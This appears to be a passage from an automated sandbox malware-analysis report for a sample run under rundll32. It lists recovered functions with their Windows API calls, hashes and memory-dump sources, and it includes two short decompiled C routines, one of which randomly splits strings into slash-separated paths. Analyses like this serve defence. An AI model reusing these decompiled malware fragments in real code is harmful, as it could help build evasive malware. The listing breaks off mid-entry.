                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                          • String ID:
                                                          • API String ID: 3239194699-0
                                                          • Opcode ID: a063c04c549d5a49191ebb4a7166949ca67cb740fa716291d9e1c2d27c1e0335
                                                          • Instruction ID: 2f50e7d63bb89f9edcc50a7bf625db01520aa1994ff1c5422dd4f0df7df46b66
                                                          • Opcode Fuzzy Hash: a063c04c549d5a49191ebb4a7166949ca67cb740fa716291d9e1c2d27c1e0335
                                                          • Instruction Fuzzy Hash: D1213B3190020DEBDF21DF65ED49EEE7BBAFF84351F140126F82AA2161E7349949DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558C5EB, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05591957: GetTickCount.KERNEL32 ref: 0559196D
                                                            • Part of subcall function 05591957: wsprintfA.USER32 ref: 055919AE
                                                            • Part of subcall function 05591957: GetModuleHandleA.KERNEL32(00000000), ref: 055919C0
                                                          • GetModuleHandleA.KERNEL32(00000000,?), ref: 0558C612
                                                          • GetLastError.KERNEL32 ref: 0558C62C
                                                          • RtlExitUserThread.NTDLL(?), ref: 0558C646
                                                          • GetLastError.KERNEL32 ref: 0558C686
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
                                                          • String ID:
                                                          • API String ID: 1798890819-0
                                                          • Opcode ID: 47f19f801a78903c78005a2426d771f26611c7121009a23951efc5c2f64a77e1
                                                          • Instruction ID: 266f20e49fd72a1f1caea88739d19e468f18f202d53eabac580313dc5e6a9cc4
                                                          • Opcode Fuzzy Hash: 47f19f801a78903c78005a2426d771f26611c7121009a23951efc5c2f64a77e1
                                                          • Instruction Fuzzy Hash: 0D116D71014245AFE710AF6AED89D7B7FBCFAC6661B01092AF852D2040DB39DC09DB71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557706C, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05592015: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05577083), ref: 0559203B
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 055770BE
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0557BF24,?), ref: 055770D0
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0557BF24,?), ref: 055770E8
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,0557BF24,?), ref: 05577103
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                          • String ID:
                                                          • API String ID: 1352878660-0
                                                          • Opcode ID: 7d3d546b4fbef0b229bc284bbc30a7bdfd204abe09ee9aa2c7747b79e5c5f802
                                                          • Instruction ID: 83df092624823710ad258cf3eec325e4b094220b3d982c99d1ca7f50912da9d3
                                                          • Opcode Fuzzy Hash: 7d3d546b4fbef0b229bc284bbc30a7bdfd204abe09ee9aa2c7747b79e5c5f802
                                                          • Instruction Fuzzy Hash: 37115871A1012DBADF21AAA5EC89EFFBF6DFF45790F144022F906E5050D7319A44EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0559295D, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,00000000,75188250,751469A0,?,?,?,05581675,?,00000000,?), ref: 0559296D
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05581675,?,00000000,?), ref: 0559298F
                                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 055929BB
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 055929CE
                                                            • Part of subcall function 0557AE41: strstr.NTDLL ref: 0557AF19
                                                            • Part of subcall function 0557AE41: strstr.NTDLL ref: 0557AF6C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3712611166-0
                                                          • Opcode ID: 539d5baa89105529908a2211b9c78729e055fb13b9996747bf6dff3cd333bfe3
                                                          • Instruction ID: ba939c5f54c22288dfddaa6c481df667dbb56a63a0689e96f2fc3c796f6fb841
                                                          • Opcode Fuzzy Hash: 539d5baa89105529908a2211b9c78729e055fb13b9996747bf6dff3cd333bfe3
                                                          • Instruction Fuzzy Hash: 9611677660011ABFCF11AFA1DC88CEE7FADFF05294B014125F90696110DB39DE45ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05591A69, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?), ref: 05591AA1
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05591AB8
                                                          • StrChrA.SHLWAPI(00000000,0000002E), ref: 05591AC1
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 05591ADF
                                                            • Part of subcall function 0557E712: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002), ref: 0557E7E9
                                                            • Part of subcall function 0557E712: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002,?,00000001), ref: 0557E804
                                                            • Part of subcall function 0557E712: RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557E828
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 105881616-0
                                                          • Opcode ID: bd03689f6954c99c32d8e22353527ec48879dff28803ffbed465717f04ef9f80
                                                          • Instruction ID: a6d2fbd64909591e0716286119b4db478bd524acf84ebb0d933c021d8697a6e6
                                                          • Opcode Fuzzy Hash: bd03689f6954c99c32d8e22353527ec48879dff28803ffbed465717f04ef9f80
                                                          • Instruction Fuzzy Hash: B7214C74A0060AEFDF15DF65C948EAEBBFABF84304F10849AE416DB250EB78D944DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557DCCE, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0557DCE9
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0557DD0D
                                                          • RegCloseKey.ADVAPI32(?), ref: 0557DD65
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0557DD36
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$AllocateCloseHeapOpen
                                                          • String ID:
                                                          • API String ID: 453107315-0
                                                          • Opcode ID: 5a2d617097ce92ff48f3c016c33991556160b8763a6e53390bc4211c90aed35f
                                                          • Instruction ID: 8d174b85fdea4b76e539081b238594daa9c833fabf8eeb9319732e73601923c9
                                                          • Opcode Fuzzy Hash: 5a2d617097ce92ff48f3c016c33991556160b8763a6e53390bc4211c90aed35f
                                                          • Instruction Fuzzy Hash: 9D2193B590010CFBDB119F99E8848EEBFBAFF84350F108066E805A6160E7719B54DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557104E, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32 ref: 05571059
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05571071
                                                          • memcpy.NTDLL(00000000,?,-00000008), ref: 055710B5
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 055710D6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 92a0e9b83962737405794185dae37179007dc496e2d11a43c801cfbdb765d373
                                                          • Instruction ID: 5049677c157be61c169a195f5eee3bc52b145724cfbeab961d109a649bb24c9b
                                                          • Opcode Fuzzy Hash: 92a0e9b83962737405794185dae37179007dc496e2d11a43c801cfbdb765d373
                                                          • Instruction Fuzzy Hash: BD112C72A10219BFC7108B69EC85D9EBFADEBC1260B050177F505D7240EA759D08D760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E54FE5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E00E54FE5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xe5a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xe5a2a8; // 0xbedf2ab
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xe5a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x00e54fed
                                                          0x00e54ff0
                                                          0x00e54ff6
                                                          0x00e5500e
                                                          0x00e55012
                                                          0x00e55015
                                                          0x00e55017
                                                          0x00e5501a
                                                          0x00e5501c
                                                          0x00e5501f
                                                          0x00e55021
                                                          0x00e55021
                                                          0x00e55023
                                                          0x00e5502e
                                                          0x00e55033
                                                          0x00e55044
                                                          0x00e5504c
                                                          0x00e55051
                                                          0x00e55054
                                                          0x00e55057
                                                          0x00e55059
                                                          0x00e5505f
                                                          0x00e55062
                                                          0x00e55062
                                                          0x00e55062
                                                          0x00e5506d
                                                          0x00e55072
                                                          0x00e5507c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00E571E9,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E54FF0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00E55008
                                                          • memcpy.NTDLL(00000000,051B9630,-00000008,?,?,?,00E571E9,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E5504C
                                                          • memcpy.NTDLL(00000001,051B9630,00000001,00E54A9F,00000000,051B9630), ref: 00E5506D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: fb40accc711da31af78f943dea7f44921d19f3a77b967384a20fa6b16e574377
                                                          • Instruction ID: 3ff5889642f31cf67e961e6186f9cd815c6e401ae690ca8f54778e704743e0fe
                                                          • Opcode Fuzzy Hash: fb40accc711da31af78f943dea7f44921d19f3a77b967384a20fa6b16e574377
                                                          • Instruction Fuzzy Hash: 8F110A72A00214BFD7148F6ADC85E9FBFBDDB81351F040675FA04A71A0E6719D08D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558EC63, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,05590C70,00000000,00000000), ref: 0558EC81
                                                          • GetLastError.KERNEL32(?,?,?,05590C70,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0557220D,?,0000001E), ref: 0558EC89
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide
                                                          • String ID:
                                                          • API String ID: 203985260-0
                                                          • Opcode ID: 67eef053e82d0d9457960a1cfb717784a2475f18f2be15ffb65497fde59f8aa3
                                                          • Instruction ID: 7e61e3d30e32cb8b105ae8616a615f8352d9676f900f5694b4531c0664dd8318
                                                          • Opcode Fuzzy Hash: 67eef053e82d0d9457960a1cfb717784a2475f18f2be15ffb65497fde59f8aa3
                                                          • Instruction Fuzzy Hash: 1401AC756082557F8730BA369C49C3BBE7DFBC6760B110A1DF961E2240DA315804D671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055906F5, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,05589FEF,?,?,?), ref: 05590709
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • mbstowcs.NTDLL ref: 05590723
                                                          • lstrlen.KERNEL32(?), ref: 0559072E
                                                          • mbstowcs.NTDLL ref: 05590748
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                          • String ID:
                                                          • API String ID: 1961997177-0
                                                          • Opcode ID: 762e2b440b595b3bd5ff9c0c92fb7cd11212a5f7319bafe36a9f0a341d096ff8
                                                          • Instruction ID: 46f2671cbadc25b3f68edb463b8d8bb673defaef7bf80e6b6043417fcde01d2b
                                                          • Opcode Fuzzy Hash: 762e2b440b595b3bd5ff9c0c92fb7cd11212a5f7319bafe36a9f0a341d096ff8
                                                          • Instruction Fuzzy Hash: 9B01B137A10209B7CB216BB69C4DF9F7BADFFC5360F104426B506A3100EA79D9108BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557862F, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05578642
                                                          • lstrlen.KERNEL32(059BAAC0), ref: 05578663
                                                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0557867B
                                                          • lstrcpy.KERNEL32(00000000,059BAAC0), ref: 0557868D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1929783139-0
                                                          • Opcode ID: b3b19a604ac7a1380d6d9fabcf817a202aeabfe86d44fff3d1b3896b6392211e
                                                          • Instruction ID: 846fce048e1da2859b21a95b1d2796fbede4f933307bff1d9e32b5a0ac0aad66
                                                          • Opcode Fuzzy Hash: b3b19a604ac7a1380d6d9fabcf817a202aeabfe86d44fff3d1b3896b6392211e
                                                          • Instruction Fuzzy Hash: B901C876604348FFC7119FAAA889E5E7FBCBB48600F110165F90AD3241DB34950CDB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557B352, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 0557B35F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 0557B385
                                                          • lstrcpy.KERNEL32(00000014,?), ref: 0557B3AA
                                                          • memcpy.NTDLL(?,?,?), ref: 0557B3B7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1388643974-0
                                                          • Opcode ID: 9c004b84e7aa51bbe3510dd334c952d61b1df42ee8c9f544de769d996934f777
                                                          • Instruction ID: 587797137877d4b4047823a20f93278c9e9e5e0880c4e35a597266710a874353
                                                          • Opcode Fuzzy Hash: 9c004b84e7aa51bbe3510dd334c952d61b1df42ee8c9f544de769d996934f777
                                                          • Instruction Fuzzy Hash: E611767150030AEFCB20CF58E884A9ABBF8FB48314F01852AF84A87210DB74E908DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05590CA6, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,7748D3B0,00000000,00000000,05575F7D,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05590CAD
                                                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05590CC5
                                                          • memcpy.NTDLL(0000000C,?,00000001,?,?,?,?,?,05572A10,00000000,00000000), ref: 05590CDB
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,7748D3B0,059BB17C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D043
                                                            • Part of subcall function 0557D01E: StrTrimA.SHLWAPI(00000000,0559847C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D062
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D06E
                                                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,05572A10,00000000,00000000), ref: 05590D0D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3208927540-0
                                                          • Opcode ID: c253547e12002a84381341d4b6aad295fbc5b03a0db9b675094b916221cc56a2
                                                          • Instruction ID: 1625e3104e333989a895dbd9ed4d717c8612f4d133bfe21d7a687b485e27e1fa
                                                          • Opcode Fuzzy Hash: c253547e12002a84381341d4b6aad295fbc5b03a0db9b675094b916221cc56a2
                                                          • Instruction Fuzzy Hash: 7101F735214306ABE7255A12ED8DF2B7FA9FBC0760F114826F60A950D0DF68B80D9B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558AA55, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • RtlInitializeCriticalSection.NTDLL(0559C300), ref: 0558AA79
                                                          • RtlInitializeCriticalSection.NTDLL(0559C2E0), ref: 0558AA8F
                                                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558AAA0
                                                          • GetModuleHandleA.KERNEL32(0000170B), ref: 0558AAD4
                                                            • Part of subcall function 0557F99E: GetModuleHandleA.KERNEL32(?), ref: 0557F9B6
                                                            • Part of subcall function 0557F99E: LoadLibraryA.KERNEL32(?), ref: 0557FA57
                                                            • Part of subcall function 0557F99E: FreeLibrary.KERNEL32(00000000), ref: 0557FA62
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                          • String ID:
                                                          • API String ID: 1711133254-0
                                                          • Opcode ID: 64516469fdc3e63e357fa336c47e03e5e0784fa8e4667cf1c1783b0f3ba7cf63
                                                          • Instruction ID: 5946d441f6f02e77ef8390134cbcbf5d21f3a35ec23ab36b3d68dec2d1fca81b
                                                          • Opcode Fuzzy Hash: 64516469fdc3e63e357fa336c47e03e5e0784fa8e4667cf1c1783b0f3ba7cf63
                                                          • Instruction Fuzzy Hash: DC116171A602009BDB10EFE9E886915BFE4F749311742056BF145E3600DFBC4C4CBB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055803E5, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 055803F0
                                                          • Sleep.KERNEL32(0000000A,?,?,?,0557CC1E,00000000,?,00000029,0559C140,055747B2,?), ref: 055803FA
                                                          • SetEvent.KERNEL32(?,?,?,0557CC1E,00000000,?,00000029,0559C140,055747B2,?), ref: 05580451
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05580470
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterEventLeaveSleep
                                                          • String ID:
                                                          • API String ID: 1925615494-0
                                                          • Opcode ID: bad84240abd85496cc1f5612b21b69beb15f73428f39fe24cb54832a716cd129
                                                          • Instruction ID: 8045862d3d604686e6b3c076e096797e58caa401395db17f9ef4a259f99f8154
                                                          • Opcode Fuzzy Hash: bad84240abd85496cc1f5612b21b69beb15f73428f39fe24cb54832a716cd129
                                                          • Instruction Fuzzy Hash: 50015271694304EBEB10ABA4EC8AF6A3FA8FB04751F514016F605E61E0DB78990CDA51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557D6FE, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558EA1C: lstrlen.KERNEL32(?,?,00000000,0557D714), ref: 0558EA21
                                                            • Part of subcall function 0558EA1C: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0558EA36
                                                            • Part of subcall function 0558EA1C: wsprintfA.USER32 ref: 0558EA52
                                                            • Part of subcall function 0558EA1C: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0558EA6E
                                                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0557D72C
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0557D73B
                                                          • CloseHandle.KERNEL32(00000000), ref: 0557D745
                                                          • GetLastError.KERNEL32 ref: 0557D74D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4042893638-0
                                                          • Opcode ID: 855e2465a5307977aafd945e09d0cd244b6ed50ec2d89132ab8eb4fd19d6378f
                                                          • Instruction ID: 9b597497da96e6773270a16841b0d89f41cccd945a1ef5347efdfc37a921c424
                                                          • Opcode Fuzzy Hash: 855e2465a5307977aafd945e09d0cd244b6ed50ec2d89132ab8eb4fd19d6378f
                                                          • Instruction Fuzzy Hash: C9F08131205218BAD7216F65ECCEF9F7E6CFF41AA1F104516F50AA6080DA35954896F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E53D0E, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E00E53D0E(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t18 = 0;
				E00E559CB(_t8,  &_v20);
				_t16 = E00E55FBC(_t19);
				if(_t16 != 0) {
					_t13 = E00E54073( &_v20, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00E55FBC(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00E513CC(_t16);
				}
				return _t18;
			}









                                                          0x00e53d19
                                                          0x00e53d1d
                                                          0x00e53d1f
                                                          0x00e53d2a
                                                          0x00e53d2e
                                                          0x00e53d37
                                                          0x00e53d3f
                                                          0x00e53d44
                                                          0x00e53d4c
                                                          0x00e53d4c
                                                          0x00e53d55
                                                          0x00e53d59
                                                          0x00e53d5f
                                                          0x00e53d62
                                                          0x00e53d68
                                                          0x00e53d68
                                                          0x00e53d70
                                                          0x00e53d70
                                                          0x00e53d77
                                                          0x00e53d77
                                                          0x00e53d82

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                            • Part of subcall function 00E54073: wsprintfA.USER32 ref: 00E540CF
